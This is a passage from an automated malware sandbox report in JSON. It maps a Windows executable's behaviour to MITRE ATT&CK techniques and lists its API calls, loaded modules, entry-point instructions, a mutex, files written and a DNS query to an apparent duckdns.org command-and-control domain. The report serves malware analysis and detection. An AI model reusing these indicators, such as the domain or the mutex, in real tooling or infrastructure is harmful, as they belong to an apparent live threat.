"T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\111qqq222www333eee-UOHX34\"\n \"111qqq222www333eee-UOHX34\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b226b@Iphlpapi.DLL\"\n \"0f001000dc4b226b@Iphlpapi.DLL\"\n \"0c000d00244c226b@Iphlpapi.DLL\"\n \"140015006c4c226b@Iphlpapi.DLL\"\n \"0c000d00e04c226b@Iphlpapi.DLL\"\n \"15001600c03e226b@ADVAPI32.dll\"\n \"0e000f00703f226b@ADVAPI32.dll\"\n \"0e000f00cc3f226b@ADVAPI32.dll\"\n \"11001200b447226b@ADVAPI32.dll\"\n \"110012004848226b@ADVAPI32.dll\"\n \"120013008c48226b@ADVAPI32.dll\"\n \"12001300e448226b@ADVAPI32.dll\"\n \"14001500386e226b@ADVAPI32.dll\"\n \"14001500506e226b@ADVAPI32.dll\"\n \"14001500686e226b@ADVAPI32.dll\"\n \"17001800806e226b@ADVAPI32.dll\"\n \"0d000e00986e226b@ADVAPI32.dll\"\n \"11001200a86e226b@ADVAPI32.dll\"\n \"11001200bc6e226b@ADVAPI32.dll\"\n \"0d000e004466226b@WININET.dll\"\n \"0d000e00b466226b@WININET.dll\"\n \"10001100ec66226b@WININET.dll\"\n \"100011009067226b@WININET.dll\"\n \"10001100006f226b@WININET.dll\"\n \"10001100146f226b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\Install (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A9CC1C.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" file has an entrypoint instructions - \"call\t0x43426d,jmp\t0x433bc9,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\t0x17,call\t0x4560b9,test\teax, eax,je\t0x433d69,mov\tecx, dword ptr [ebp + 8],int\t0x29,push\t3,call\t0x433f2f,mov\tdword ptr [esp], 0x2cc,lea\teax, [ebp - 0x324],push\t0,push\teax,call\t0x436260,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"DISMHOST.EXE.67A9CC1C.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:576\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"cam4r4sd3s3gur1d4.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has an executable section named \".text\"\n \"DISMHOST.EXE.67A9CC1C.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has an writable section named \".data\"\n \"DISMHOST.EXE.67A9CC1C.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67A9CC1C.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f30000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"KERNEL32\" at base 75b30000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"KERNEL32.DLL\" at base 75b30000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75790000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a20000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74580000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74a10000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"DNSAPI.DLL\" at base 748e0000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"IPHLPAPI.DLL\" at base 73260000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"RPCRT4.DLL\" at base 75490000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"RASADHLP.DLL\" at base 70eb0000\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 731d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75490000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A9CC1C.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9CC1C.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9CC1C.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A9CC1C.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67A9CC1C.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-sysinfo-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" writes a file \"C:\\ProgramData\\Install\\Ing.dat\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" writes a file \"%ALLUSERSPROFILE%\\Install\\Ing.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": 